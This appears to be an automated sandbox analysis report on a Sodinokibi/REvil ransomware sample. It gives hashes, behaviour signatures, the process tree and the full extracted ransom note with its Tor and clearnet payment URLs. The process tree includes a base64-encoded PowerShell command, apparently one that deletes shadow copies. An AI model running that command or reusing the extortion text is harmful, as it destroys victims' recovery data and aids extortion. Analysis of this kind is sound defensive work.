Overview

overview

10

Static

static

10

adb.vbs.exe

windows7-x64

10

adb.vbs.exe

windows10-1703-x64

10

adb.vbs.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    09-08-2023 07:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    adb.vbs.exe

  • Size

    116KB

  • MD5

    b86ad4241b01376b3924a380f6f4c934

  • SHA1

    10682d08a18715a79ee23b58fdb6ee44c4e28c61

  • SHA256

    14c8e3f1f23d16c2c9a4272cd05d00461d27b372cc5f588b4bbfc6102bbed708

  • SHA512

    54fd19cfc37255e7ddf3456d1a2989558522cf58e5eee6ca916c19542921fe3ba4e7a431a35e0e1edbfc37c5651d392e7c3c54eb408754c0488021b16fdf92c9

  • SSDEEP

    1536:aTZINbRh0SKws6KTUkmHlntMvfWhbpfCqeICS4AKvQIFlswOmZFS0cnwpIGmQwB:FRix3PWhNlOVFmw5q0cifmQ

Score
10/10
sodinokibiransomware

Malware Config

Extracted

Path

C:\Users\627o399m-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 627o399m. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] WE ARE READY TO PUBLISH UR DATA TO PUBLIC ACCESS IF YOU NOT CONTACT US (USE TOR BROWSER TO VIEW) http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/posts/125?s=7ee0235fc7f67403393ad971dea5809e [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5427461206FF740C 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/5427461206FF740C Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: csrwVepYyXqPuHQ85db3nmkFoO1WuIVQZVzkJvehUHHUUudUOjeQXwRbRa0YOQ3N 6EOPwAsOaTh1WFXePFk5Sx3D1xE3Lp7CeGySbprgEe7vLQjY3ka3cpOewjmHkKx9 c88ZbnY3OJXtMczvEEQLS4mb8BkSt7TulrPHZqleY1saCM2u5soj3yf/80yuNPYz L0EanGtDfJFxkLEhNKms5Nl11oHoUoMTmKUYAc4LM8xk3iWz7cbi9bhu4c1j21Ki +SGcUWdR+IDoIe50USRvkvfbgvpcL1x7lJ1I8D60Kj+8ZWqqxD4mM8IXSqlV7Ogg Ph/suWHzZUM0XNWOAOUdxLTkqcVhDvk5ZX9V4pV6AqLUlGLTnJUhXZf60ylee/PI WXvkPaMC9aitxSLS4UxPz/ykW1StaWaXHpjDrxK/A+MdlV95Qrq40Qg9LB2iF4Lw C6bHc7psCE1EurJwon/e3jroC25vaxwFmaGuTCb8OHLhgKbsfAYgRaxaUQWwVSIO ns0TyFeTe/ZNB1kSWMJPqfLKeWTiU+SCVTBywvL0BVcfHLU44yykNlQY2J8Kgp3i u5hgGhglWQxIvcqnLr6+/cg4jGZRVlMW5rI8NJoL/04cpEkbyUp90KviOyT5Afgp eW4RKvglmV93asZ1oj3pTTxQYR6LMyEIh5kcqgmytp8/AkUBRkS/0YuUQ+UMDKYA I5e2z1nj8ZlH1y4uy8l/6mx4ycPD8dkrtAszogA+17munV/K1WVHtNkJUVhb8uR4 7dYVAM3ywUtvA0QY8Ec5qJCppjbNYlbvk+umab1d8pkPLjPHT2OiW92XyfxRmprp SzuekwDmEfGhNUt3Fgf5zDuoxoa1Dgornukh+FebxhioKSVhPjE90um9RA8tuFjA M3JQTXhxaeAThAcPKuMD3y+w6bFekzVO3Ilb6/INWL7ZBqDSode6eBub93fpRQBp NVoQkv5a6ixwhqTfxyB0Re/OdJClZyV87VDA677YqSPTKCliz+mD1mf2Du/0zjeN 4Jo0xcrqWV6LMC5GeoDjgXaDLWNLwgVsjxuXtaidhJIvyeXNMHwo3+GQrxaBJ20R PyNRdsqNrhVOx6HE+0AMATOCAQuxr5YceeLDAty1VTTBSDkROk0hOR3xqS0JTlc2 fKj+KlCqTHrV0+aNWXRAf8xabzIJOS5XP8r35sHOleR/JmrU4lOpBg4f5L1g8PZx G8A25H/YZ8OIT7i5YRBu/JpaCHcD1JgO5Q4kCT3CZXoK2BpOafMQStGzuRU2IM62 wdTPq98+OEPyUjZfQ0RvRcgmA41lkXKjXmNDFWs6bhjmJf1GTYgB8zGm2g1mPMiM 4xIX7Gky+Kit4y2FbkQ6VOPVY5atSxsJ/Na8A894rTN4vYBM ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5427461206FF740C

http://decryptor.cc/5427461206FF740C

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 21 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\adb.vbs.exe
    "C:\Users\Admin\AppData\Local\Temp\adb.vbs.exe"
    1⤵
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2556
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2064
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2988
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2384

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\627o399m-readme.txt
      Filesize

      7KB

      MD5

      a8e4c6d66dcf2f8ed6c783cbdb484045

      SHA1

      c541214daa6eba88bbee248c45ce4343b569e68c

      SHA256

      b27f45c2dc553ac92894ad07b5ea20cb74a05baa97cf2f20ecfd230b521e7e4d

      SHA512

      c8b5a3ca36d7176c7828f2fb6cf5ef0f8affa30694c0cb5c97f053ab6a382b1614b9258f44f872f0c70e7b63444b8350eff271b91dd9646a7a1481610ad86630

      Download Submit

    • memory/2064-58-0x000000001B340000-0x000000001B622000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2064-59-0x0000000002220000-0x0000000002228000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2064-62-0x0000000002AE0000-0x0000000002B60000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2064-61-0x0000000002AE0000-0x0000000002B60000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2064-60-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2064-63-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2064-64-0x0000000002AE0000-0x0000000002B60000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2064-65-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

      Filesize

      9.6MB

      Download